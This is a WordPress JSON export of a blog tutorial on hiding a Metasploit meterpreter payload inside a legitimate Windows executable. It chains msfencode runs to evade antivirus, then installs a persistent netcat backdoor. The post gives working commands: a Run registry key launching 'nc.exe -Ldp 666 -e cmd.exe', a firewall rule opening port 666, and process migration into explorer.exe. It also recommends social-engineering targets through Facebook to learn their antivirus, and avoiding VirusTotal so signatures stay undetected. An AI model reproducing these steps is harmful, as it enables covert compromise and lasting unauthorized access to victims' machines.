{"id":250,"date":"2013-01-09T19:54:14","date_gmt":"2013-01-09T18:54:14","guid":{"rendered":"http:\/\/under12oot.noblogs.org\/?p=250"},"modified":"2014-01-30T16:11:28","modified_gmt":"2014-01-30T15:11:28","slug":"generate-%ef%bb%bfundetectable-payload-and-%ef%bb%bfpersistent-netcat-backdoor","status":"publish","type":"post","link":"https:\/\/under12oot.noblogs.org\/?p=250","title":{"rendered":"Generate Undetectable Payload and Persistent Netcat Backdoor"},"content":{"rendered":"<p>This is the second article. It explains how to create a payload that is as &#8220;undetectable&#8221; as possible by antivirus software and, once the system has been exploited, how to create a persistent backdoor with netcat. At the end of the article there are also some further thoughts on the &#8220;detectable\/not detectable&#8221; question, and <a title=\"metpay.sh\" href=\"http:\/\/pastebin.com\/5iSbYdy1\" target=\"_blank\">attached<\/a> is the script I wrote to speed up the generation and obfuscation steps&#8230; As with the previous article, the English used is very simple and the images are self-explanatory. Enjoy!<\/p>\n<h6 align=\"LEFT\"><b>In this article we show you how to build a meterpreter payload inside an existing EXE, mask it from AV detection and make a persistent netcat backdoor with BackBox 2.05<\/b><\/h6>\n<h6 align=\"LEFT\"><b>What you will learn&#8230;<\/b><\/h6>\n<ul>\n<li>\n<p>how to generate a payload with msfpayload<\/p>\n<\/li>\n<li>\n<p>how to encode it with msfencode and mask the payload from AV detection<\/p>\n<\/li>\n<li>\n<p>how to upload netcat and execute it at start-up<\/p>\n<\/li>\n<\/ul>\n<h6 align=\"LEFT\"><b>What you should know&#8230;<\/b><\/h6>\n<ul>\n<li>\n<p>you have to know (read: you MUST know) how to move around a Linux system and use its basic commands, for example moving through directories and copying\/pasting\/removing files or directories<\/p>\n<\/li>\n<li>\n<p>you have to know (at least the basics of) how msfpayload, msfencode and msfconsole work<\/p>\n<\/li>\n<\/ul>\n<p><b>We will start by choosing a payload and generating it!<\/b><\/p>\n<p>Selecting a payload is very simple, but we have to keep in mind that AV signatures cover most of the known payloads generated by msfpayload. This is due to the considerable use of web sites like virustotal.com, which analyze the payloads uploaded to them and share the resulting signatures with the software houses that develop antivirus products. In our practical case we will make sure that our signature is not indexed\/detected. To perform this task I am going to use one of my scripts, which lets me switch between different payloads and different encoders and also sets up msfconsole with the correct listener. This lets me do the job faster.<\/p>\n<p>So let&#8217;s run through it together, step by step.<\/p>\n<div id=\"attachment_246\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-246\" class=\"size-medium wp-image-246  \" alt=\"run script\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-246\" class=\"wp-caption-text\">run script<\/p><\/div>\n<p>Let&#8217;s start with meterpreter reverse_tcp (the most detectable one). Meterpreter, short for The Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that would otherwise be tedious to implement purely in assembly. It accomplishes this by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred. Meterpreter and all of the extensions it loads are executed entirely from memory and never touch the disk, thus allowing them to execute under the radar of standard antivirus detection.<\/p>\n<p>To build a payload we need to know our IP address (the private one; remember that we are on the same network as the victim) and the port where we will put the listener. My script does that automatically by asking for the IP address and PORT. So we can set up the payload (also remember that different payloads have different options) with the correct variables, and we can also choose the EXE where we want to hide our payload!!!<\/p>\n<p>The command to generate the payload is simple:<\/p>\n<p><i><span style=\"text-decoration: underline\">msfpayload $payload $IP $PORT<\/span><\/i><\/p>\n<div id=\"attachment_247\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-247\" class=\"size-medium wp-image-247 \" alt=\"choose a suitable executable\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-247\" class=\"wp-caption-text\">choose a suitable executable<\/p><\/div>\n<p>To this end I&#8217;ve selected msnsgs.exe (messenger); we may have several EXEs in our path. So: choose the payload, generate it, choose an existing EXE, hide the payload inside the selected EXE, and encode everything in order to mask it from AV detection. This part is not simple!<\/p>\n<p>The current generation of AVs detects payloads generated with msfpayload. While preparing the practical case for this article I ran tests with the Avast and AVG antivirus products. Avast detected all of my payloads, but with AVG, after several attempts, I found a way to evade detection.<\/p>\n<p>As you can see in the image, the best thing to do is to pipe different encoders &#8220;x&#8221; times&#8230; At this step we have to work hard and try many, many times. This is the hardest part of the whole exercise and it requires a lot of time: we have to find a way for our signature to escape AV detection.<\/p>\n<p>Honestly speaking, there is no exact science here, but there is a sequence of steps to follow, and the only way to succeed is knowing how to play around with this technique\/sequence of instructions. The technique consists of knowing how to play with the encoders and their options. My personal suggestion is to make a few more iterations over the encoders (getting more familiar with them and chaining them); with a good information gathering phase we can hopefully discover which AV is running on the target system, and in that way build a payload obfuscated against a specific AV. We can no longer build stealth executable binaries the way it was possible until a short time ago. So patience plays a fundamental role if we want to use msfpayload, because, I&#8217;d like to remind you, if we don&#8217;t want to be detected and blocked by AV we have no choice but to write our own backdoor.<\/p>\n<p>So, let&#8217;s go ahead and perform the following action to encode the payload inside an EXE file:<\/p>\n<p><span style=\"text-decoration: underline\">msfencode -e $encode -c $ManyTimeEnc -t $type -x $exe -o $output<\/span><\/p>\n<p>Which in our case is:<\/p>\n<p><i><span style=\"text-decoration: underline\">msfpayload $payload $IP $PORT | msfencode -e $encode -c $ManyTimeEnc -t $type -x $exe -o $output1 | msfencode -e $encode -c $ManyTimeEnc -t $type -x $output1 -o $output2 | msfencode -e $encode -c $ManyTimeEnc -t $type -x $output2 -o $output3<\/span><\/i><\/p>\n<div id=\"attachment_248\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-248\" class=\"size-medium wp-image-248 \" alt=\"set up ip address\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-248\" class=\"wp-caption-text\">set up ip address<\/p><\/div>\n<p>As mentioned above, you can try several times with different encoders and different options&#8230; This step is the hard one, but nothing is impossible: our goal here is to bypass AV detection!!!<\/p>\n<div id=\"attachment_249\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-249\" class=\"size-medium wp-image-249 \" alt=\"threat detected\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-249\" class=\"wp-caption-text\">threat detected<\/p><\/div>\n<p>&#8230;the way to bypass AV detection!!!<\/p>\n<div id=\"attachment_251\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-251\" class=\"size-medium wp-image-251 \" alt=\"upload evil exe\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-251\" class=\"wp-caption-text\">upload evil exe<\/p><\/div>\n<div id=\"attachment_252\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/6.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-252\" class=\"size-medium wp-image-252 \" alt=\"undetected\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/6-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/6-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/6-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/6.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-252\" class=\"wp-caption-text\">undetected<\/p><\/div>\n<p>Msfconsole has been set up and started by our automated script, the infected EXE has been uploaded via a shared folder, and no threat has been found, so let&#8217;s go into meterpreter. Meterpreter offers us a suite of commands and useful tools to proceed and succeed in what we are doing here. The first thing to do is to migrate into another process: this is necessary in case our executable gets blocked, which would terminate the meterpreter session. The migration is usually done into explorer.exe, which is the application manager of Windows, an essential process for the functioning of the system.<\/p>\n<div id=\"attachment_253\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-253\" class=\"size-medium wp-image-253 \" alt=\"meterpreter\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-253\" class=\"wp-caption-text\">meterpreter<\/p><\/div>\n<div id=\"attachment_255\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/9.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-255\" class=\"size-medium wp-image-255 \" alt=\"process list\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/9-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/9-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/9-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/9.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-255\" class=\"wp-caption-text\">process list<\/p><\/div>\n<div id=\"attachment_256\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/10.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-256\" class=\"size-medium wp-image-256 \" alt=\"migrate the process\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/10-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/10-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/10-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/10.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-256\" class=\"wp-caption-text\">migrate the process<\/p><\/div>\n<p>Now let&#8217;s migrate the process into explorer.exe with the following command:<\/p>\n<p><span style=\"text-decoration: underline\">migrate $id<\/span><\/p>\n<p>Above you can see different screenshots of the same process&#8230;<\/p>\n<p align=\"LEFT\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/12.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-258\" alt=\"12\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/12-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/12-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/12-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/12.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"LEFT\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/13.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-259\" alt=\"13\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/13-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/13-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/13-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/13.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Now let&#8217;s proceed with the upload and set-up of netcat. For this step we need the tool nc.exe!<\/p>\n<p>The following steps set up nc.exe so that it starts automatically at the next reboot. For this I&#8217;ve selected port 666 (just to be a bit evil<i> \ud83d\ude09<\/i> ). This step also includes modifying the Windows registry and the firewall.<\/p>\n<p><i><span style=\"text-decoration: underline\">upload netcat.exe<\/span><\/i><\/p>\n<p><span style=\"text-decoration: underline\">meterpreter &gt; upload \/pentest\/windows-binaries\/tools\/nc.exe C:\\\\windows\\\\system32<\/span><\/p>\n<p>This adds nc.exe to the registry so that it starts at boot. To do this we modify the registry key &#8216;HKLM\\software\\microsoft\\windows\\currentversion\\run&#8217; so that netcat runs on port 666 at every reboot of the system.<\/p>\n<p><span style=\"text-decoration: underline\">meterpreter &gt; reg enumkey -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run<\/span><\/p>\n<p><span style=\"text-decoration: underline\">meterpreter &gt; reg setval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run -v nc -d &#8216;C:\\windows\\system32\\nc.exe -Ldp 666 -e cmd.exe&#8217;<\/span><\/p>\n<p><span style=\"text-decoration: underline\">meterpreter &gt; reg queryval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\Run -v nc<\/span><\/p>\n<p>Next we alter the system to allow remote connections through the firewall. We just open a normal Windows CMD and run the &#8220;netsh&#8221; command to apply the changes, as follows:<\/p>\n<p><span style=\"text-decoration: underline\">meterpreter &gt; execute -f cmd -i<\/span><\/p>\n<p><span style=\"text-decoration: underline\">D:\\&gt; netsh firewall show opmode<\/span><\/p>\n<p>This needs to open the firewall: <span style=\"text-decoration: underline\">D:\\&gt; netsh firewall add portopening TCP 666 &#8220;Service Firewall&#8221; ENABLE ALL<\/span><\/p>\n<div id=\"attachment_260\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/14.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-260\" class=\"size-medium wp-image-260 \" alt=\"open the Windows firewall\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/14-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/14-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/14-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/14.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-260\" class=\"wp-caption-text\">open the Windows firewall<\/p><\/div>\n<p>Now let&#8217;s reboot the virtual machine and connect with netcat&#8230;<\/p>\n<div id=\"attachment_261\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/15.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-261\" class=\"size-medium wp-image-261 \" alt=\"reboot and connection with netcat\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/15-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/15-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/15-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/15.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-261\" class=\"wp-caption-text\">reboot and connection with netcat<\/p><\/div>\n<div id=\"attachment_262\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/16.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-262\" class=\"size-medium wp-image-262 \" alt=\"connected ;)\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/16-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/16-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/16-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/16.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-262\" class=\"wp-caption-text\">connected \ud83d\ude09<\/p><\/div>\n<p>The article ended here, but as you can see for yourselves, creating an executable that is really undetectable is a very hard undertaking; we could say it is almost a matter of luck&#8230; which obviously doesn&#8217;t suit us. So what can we do? Well, there are a couple of things that can certainly help:<\/p>\n<ul>\n<li>a good, if not excellent, information gathering and social engineering session, with the help of Facebook for example: once we have contacted our target we can try to get them to tell us which AV runs on their machine. That way we can focus on making the executable safe against a single AV instead of groping in the dark, saving a lot of time and effort!<\/li>\n<li>we can create and write the malware ourselves, which is perhaps the only sure method&#8230;.<\/li>\n<li>or, the last option, not simple but all in all fairly reliable, is to follow what is described in these two articles <a title=\"art1\" href=\"http:\/\/tinyurl.com\/5tjtr4x\" target=\"_blank\">http:\/\/tinyurl.com\/5tjtr4x<\/a> and <a title=\"art2\" href=\"http:\/\/tinyurl.com\/3v8zrkv\" target=\"_blank\">http:\/\/tinyurl.com\/3v8zrkv<\/a>. I have read them several times and I am still trying to understand them properly, which is my fault and due to my gaps in programming&#8230; for now they remain, in fact, the best solution for obfuscating a payload inside an executable. If anyone passing by reads this article and wants to discuss it with me and help me clear up the doubts I still have, I&#8217;ll be happy to share my results and my &#8220;experiments&#8221; on the subject.<\/li>\n<\/ul>\n<h6>Some remarks on the script:<\/h6>\n<p>What I wrote is a simple bash script; I didn&#8217;t need it to be written &#8220;well&#8221;, I needed it to quickly perform the steps that I would otherwise have had to repeat by hand dozens and dozens of times&#8230; My advice is to play a lot with the encoders and with the various payloads. Remember that you must already have some Windows executables (I used messenger, calc and flash). The script also writes the .rc file that msfconsole will load to start the handler waiting for an incoming connection; if everything goes well you should have an open meterpreter session! Since you will have to repeat the operation many times, I thought keeping track of the time\/date was a good idea, so as not to mix up the dozens of .exe files you will create before finding the right combination of encoders and payloads that isn&#8217;t detected by AVs&#8230;. The -t flag is currently set to vbs; I suggest trying raw first and then exe! Another VERY important piece of advice, also clearly stated in the article: avoid using virustotal. By dint of uploading executables, the msf signatures are by now burned, and this is the big problem that currently prevents us from completing a pentest session. It&#8217;s true that on the one hand this is a good thing, since at least we can be sure that the first little punk can&#8217;t infect us, but on the other hand it makes our life difficult, sometimes &#8220;needlessly&#8221;. So avoid scanning with virustotal if you don&#8217;t want your creation to be recognized by every antivirus the next day: virustotal, being in partnership with the AV vendors, releases your signatures!! =) I hope someone is interested in the question and comes forward!<\/p>\n<p>Talk to you soon, and maybe there will be more news!!! Cheers!!<\/p>\n<p>noyse<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This is the second article. It explains how to create a payload that is as &#8220;undetectable&#8221; as possible by antivirus software and, once the system has been exploited, how to create a persistent backdoor with netcat. At the end of the article there are also some further thoughts on the &#8220;detectable\/not detectable&#8221; question, and attached is the script I wrote to speed up the generation [&hellip;]<\/p>\n","protected":false},"author":5820,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[13,35,36],"class_list":["post-250","post","type-post","status-publish","format-standard","hentry","category-howto","tag-hack","tag-meterpreter","tag-payload-undetected"],"_links":{"self":[{"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/posts\/250","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/users\/5820"}],"replies":[{"embeddable":true,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=250"}],"version-history":[{"count":17,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/posts\/250\/revisions"}],"predecessor-version":[{"id":269,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/posts\/250\/revisions\/269"}],"wp:attachment":[{"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=250"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=250"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=250"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}